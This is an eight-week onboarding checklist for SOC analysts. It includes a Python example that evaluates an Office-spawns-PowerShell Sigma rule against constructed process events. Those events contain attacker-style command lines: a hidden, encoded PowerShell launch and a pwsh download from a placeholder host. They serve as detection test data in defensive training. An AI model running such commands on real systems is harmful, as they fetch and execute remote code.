# Analyst Training Checklist
Purpose: Structured 8-week onboarding program for new SOC analysts. Ensures comprehensive coverage of tools, processes, and procedures before production rotation.
Analyst Name: ____ Start Date: YYYY-MM-DD Mentor: ___ SOC Manager: _____ Target Completion: 8 weeks
## Week 1: Environment & Access
| # | Task | Resource | Done |
|---|---|---|---|
| 1.1 | Receive laptop, badge, credentials | IT Ops | ☐ |
| 1.2 | Complete security clearance / NDA | HR + Legal | ☐ |
| 1.3 | Access provisioned: SIEM, EDR, SOAR, Ticketing | IAM Team | ☐ |
| 1.4 | Read: System Activation | Self-study | ☐ |
| 1.5 | Read: Data Governance Policy | Self-study | ☐ |
| 1.6 | Read: Change Management (RFC) | Self-study | ☐ |
| 1.7 | Tour: SOC facility, war room, escalation phones | Mentor | ☐ |
✅ Checkpoint: Can navigate the SIEM dashboard and locate the alert queue unaided. Mentor Signature: _ Date: _
## Week 2: SOC Operations
| # | Task | Resource | Done |
|---|---|---|---|
| 2.1 | Read: Shift Handoff Standard | Self-study | ☐ |
| 2.2 | Read: Escalation Matrix | Self-study | ☐ |
| 2.3 | Read: SOC Metrics & KPIs | Self-study | ☐ |
| 2.4 | Read: SOC Communication SOP | Self-study | ☐ |
| 2.5 | Shadow: Observe 2 complete shift handoffs | Shift Lead | ☐ |
| 2.6 | Practice: Complete a shift handover log (mock) | Mentor | ☐ |
✅ Checkpoint: Explain shift handoff process, identify escalation contacts. Mentor Signature: _ Date: _
## Week 3: Incident Response Framework
| # | Task | Resource | Done |
|---|---|---|---|
| 3.1 | Read: IR Framework (NIST) | Self-study | ☐ |
| 3.2 | Read: Severity Matrix | Self-study | ☐ |
| 3.3 | Read: Incident Classification | Self-study | ☐ |
| 3.4 | Review: Incident Report Template | Self-study | ☐ |
| 3.5 | Shadow: Observe Tier 2 handling a real incident | Tier 2 Analyst | ☐ |
| 3.6 | Study: RACI matrix — know who does what | Self-study | ☐ |
✅ Checkpoint: Explain each phase of the IR lifecycle as defined in the IR Framework (NIST SP 800-61 groups the lifecycle into four phases; the six-phase PICERL model splits containment, eradication and recovery into separate phases) and the containment decision criteria for Critical vs High severity. Mentor Signature: _ Date: _
## Week 4: Playbooks (Core Set)
| # | Task | Resource | Done |
|---|---|---|---|
| 4.1 | Read: PB-01 Phishing | Self-study | ☐ |
| 4.2 | Read: PB-02 Ransomware | Self-study | ☐ |
| 4.3 | Read: PB-03 Malware Infection | Self-study | ☐ |
| 4.4 | Read: PB-04 Account Compromise | Self-study | ☐ |
| 4.5 | Read: PB-05 BEC | Self-study | ☐ |
| 4.6 | Walk-through: Execute phishing playbook on a mock alert | Mentor | ☐ |
| 4.7 | Walk-through: Execute malware playbook on a mock alert | Mentor | ☐ |
✅ Checkpoint: Explain the "Containment" step for Ransomware; demonstrate phishing triage on mock alert. Mentor Signature: _ Date: _
## Week 5: Detection & Threat Intelligence
| # | Task | Resource | Done |
|---|---|---|---|
| 5.1 | Read: Content Management Lifecycle | Self-study | ☐ |
| 5.2 | Read: Threat Intelligence Lifecycle | Self-study | ☐ |
| 5.3 | Review: Sigma Rules Library (browse 10 rules) | Self-study | ☐ |
| 5.4 | Read: Log Source Matrix | Self-study | ☐ |
| 5.5 | Practice: Write a basic SIEM correlation search | Mentor | ☐ |
| 5.6 | Practice: Enrich an IoC using VirusTotal and URLScan | Mentor | ☐ |
✅ Checkpoint: Explain the logic of the proc_office_spawn_powershell.yml Sigma rule; demonstrate IoC enrichment. Mentor Signature: _ Date: _
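The Week 5 checkpoint asks the analyst to explain the logic of the proc_office_spawn_powershell.yml rule. The block below is an added example and is not code from this checklist, from the SOC's rule library or from SigmaHQ: it writes an approximation of that rule as a Python dict (parent image is an Office binary, child image is PowerShell, minus a hypothetical tuning filter), implements the handful of Sigma field modifiers it needs, and runs it over constructed Sysmon-style process-creation records. The rule content, the filter path `\CorpOfficeAddins\`, the usernames and the events are all assumptions made for the example.

```python
"""Sigma-style detection logic run over constructed process-creation events.

Added example for tasks 5.3/5.5 and the Week 5 checkpoint; not code from the
checklist or from SigmaHQ. RULE approximates an "Office product spawns
PowerShell" detection; the SOC's own proc_office_spawn_powershell.yml may use
other fields, values or filters.
"""

# Sigma rule as a Python dict (normally YAML) so the block runs with no
# dependencies. Modifiers follow Sigma semantics: `|endswith`, `|startswith`,
# `|contains`, or none for an exact match; matching is case-insensitive.
RULE = {
    "title": "Office Product Spawning PowerShell (approximation)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_parent": {
            "ParentImage|endswith": [
                "\\winword.exe", "\\excel.exe", "\\powerpnt.exe", "\\outlook.exe",
            ],
        },
        "selection_child": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
        # Hypothetical tuning filter: a corporate add-in known to launch PowerShell.
        "filter_known_addin": {"CommandLine|contains": "\\CorpOfficeAddins\\"},
        "condition": "selection_parent and selection_child and not filter_known_addin",
    },
    "level": "high",
}


def field_matches(event, key, values):
    """True if event[field] satisfies `field|modifier` for any listed value."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()  # a missing field never matches
    for value in [values] if isinstance(values, str) else values:
        value = value.lower()
        if modifier == "endswith" and actual.endswith(value):
            return True
        if modifier == "startswith" and actual.startswith(value):
            return True
        if modifier == "contains" and value in actual:
            return True
        if modifier == "" and actual == value:
            return True
    return False


def selection_matches(event, selection):
    """Fields inside one selection are ANDed (Sigma map semantics)."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """Evaluate a condition of the form "a and b and not c" for one event.

    That shape covers most parent/child process rules; "1 of", "all of" or
    OR groups need a real Sigma backend such as pySigma.
    """
    detection = rule["detection"]
    results = {name: selection_matches(event, sel)
               for name, sel in detection.items() if name != "condition"}
    for term in detection["condition"].split(" and "):
        term = term.strip()
        negated = term.startswith("not ")
        name = term[4:].strip() if negated else term
        if results[name] == negated:  # unmet selection, or a filter that matched
            return False
    return True


def run_rule(rule, events):
    """Return the indices of events that would raise an alert."""
    return [i for i, event in enumerate(events) if evaluate(rule, event)]


# Constructed Sysmon Event ID 1 style records (not real telemetry).
EVENTS = [
    # 0: Word macro launches a hidden, encoded PowerShell -> alert
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
     "User": "CORP\\jdoe"},
    # 1: user opens PowerShell from the Start menu -> parent is explorer, no alert
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe",
     "User": "CORP\\jdoe"},
    # 2: Word itself starting -> child is not PowerShell, no alert
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" report.docx', "User": "CORP\\jdoe"},
    # 3: Excel spawns PowerShell 7; upper-case path still matches -> alert
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\PROGRAM FILES\MICROSOFT OFFICE\ROOT\OFFICE16\EXCEL.EXE",
     "CommandLine": "pwsh.exe -c Invoke-WebRequest http://example.invalid/x",
     "User": "CORP\\asmith"},
    # 4: Outlook add-in on the tuning filter's path -> suppressed
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": r"powershell.exe -File C:\CorpOfficeAddins\sync.ps1",
     "User": "CORP\\asmith"},
]

if __name__ == "__main__":
    for i in run_rule(RULE, EVENTS):
        e = EVENTS[i]
        print(f"ALERT [{RULE['level']}] {RULE['title']}: {e['ParentImage']} -> {e['CommandLine']}")
```

The point to be able to explain at the checkpoint is in the condition, not the file names: the rule fires on the parent/child relationship (an Office process that should only render documents creating a shell), so the alert is meaningful even when the command line is obfuscated, as in event 0. Events 1 and 2 show why both selections are required, and event 4 shows the cost of a filter: the narrower its match (a specific path, not just "contains powershell"), the less an attacker can hide behind it. In production the YAML rule is converted to the SIEM's query language with sigma-cli/pySigma rather than evaluated by a script like this one.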
## Week 6: Compliance & Data Handling
| # | Task | Resource | Done |
|---|---|---|---|
| 6.1 | Read: PDPA Compliance | Self-study | ☐ |
| 6.2 | Read: Data Handling Protocol | Self-study | ☐ |
| 6.3 | Read: Evidence Handling | Self-study | ☐ |
| 6.4 | Quiz: Data classification — what is PII, what requires notification? | Mentor | ☐ |
✅ Checkpoint: Correctly classify 5 data scenarios by PDPA requirements. Mentor Signature: _ Date: _
## Week 7: Simulation & Testing
| # | Task | Resource | Done |
|---|---|---|---|
| 7.1 | Read: Simulation Guide | Self-study | ☐ |
| 7.2 | Read: Atomic Test Map | Self-study | ☐ |
| 7.3 | Execute: Atomic Red Team Test (T1059.001 — PowerShell) | Lab | ☐ |
| 7.4 | Execute: Atomic Red Team Test (T1566.001 — Spearphishing) | Lab | ☐ |
| 7.5 | Verify: Confirm the SIEM raised an alert for each simulation and that each alert maps to the expected technique ID (T1059.001, T1566.001) | Lab | ☐ |
| 7.6 | Participate: Tabletop exercise (IR scenario) | SOC Team | ☐ |
✅ Checkpoint: Successfully executed 2 Atomic tests, verified detection in SIEM, participated in tabletop. Mentor Signature: _ Date: _
## Week 8: Validation & Graduation
| # | Task | Resource | Done |
|---|---|---|---|
| 8.1 | Handle: 5 real alerts independently (with mentor oversight) | Production | ☐ |
| 8.2 | Submit: Mock Incident Report (full lifecycle) | Template | ☐ |
| 8.3 | Complete: Written assessment (30 questions) | SOC Manager | ☐ |
| 8.4 | Complete: Practical assessment (mock triage + escalation) | SOC Manager | ☐ |
| 8.5 | Conduct: 1 shift handoff as incoming lead (supervised) | Shift Lead | ☐ |
✅ Final Assessment:
| Criteria | Score | Pass/Fail |
|---|---|---|
| Written Assessment (≥ 80%) | ____/100 | ☐ |
| Practical Assessment (≥ 80%) | ____/100 | ☐ |
| Mock Incident Report Quality | ____/5 | ☐ |
| Mentor Recommendation | Yes/No | ☐ |
🎓 Final Sign-off: Ready for Production Rotation.
| Role | Name | Signature | Date |
|---|---|---|---|
| Analyst | | | |
| Mentor | | | |
| SOC Manager | | | |
## Recommended Certifications
| Certification | Provider | Level | Recommended Timeline |
|---|---|---|---|
| CompTIA Security+ | CompTIA | Entry | Before start |
| CompTIA CySA+ | CompTIA | Intermediate | Within 6 months |
| GIAC GSOC | GIAC / SANS | Intermediate | Within 1 year |
| SC-200 | Microsoft | Intermediate | Within 6 months |
| BTL1 | Security Blue Team | Entry–Intermediate | Within 6 months |
## Related Documents
- Analyst Onboarding Path — Detailed onboarding roadmap
- SOC Team Structure — Roles and career paths
- Simulation Guide — Lab exercises
- Incident Report Template — Report format